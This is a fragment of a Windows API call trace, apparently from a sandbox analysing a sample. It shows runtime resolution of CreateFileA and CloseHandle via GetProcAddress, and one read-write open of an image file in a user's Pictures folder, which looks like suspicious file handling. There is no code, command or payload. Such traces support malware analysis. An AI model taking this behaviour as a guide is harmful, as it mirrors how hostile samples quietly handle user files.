HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.930] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd9d8 [0189.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd9d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0189.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.930] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0189.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0189.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd9d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0189.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.931] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0189.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0189.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0189.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x54) returned 0x8c4a48 [0189.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", cchWideChar=84, lpMultiByteStr=0x8c4a48, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp", lpUsedDefaultChar=0x0) returned 84 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.932] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\qs5wbgjku5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=84, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa8) returned 0x8fcbc0 [0189.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=84, lpWideCharStr=0x8fcbc0, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.bmp") returned 84 [0189.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0189.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0189.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0189.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.935] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.937] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0189.938] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.939] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.940] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0189.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) 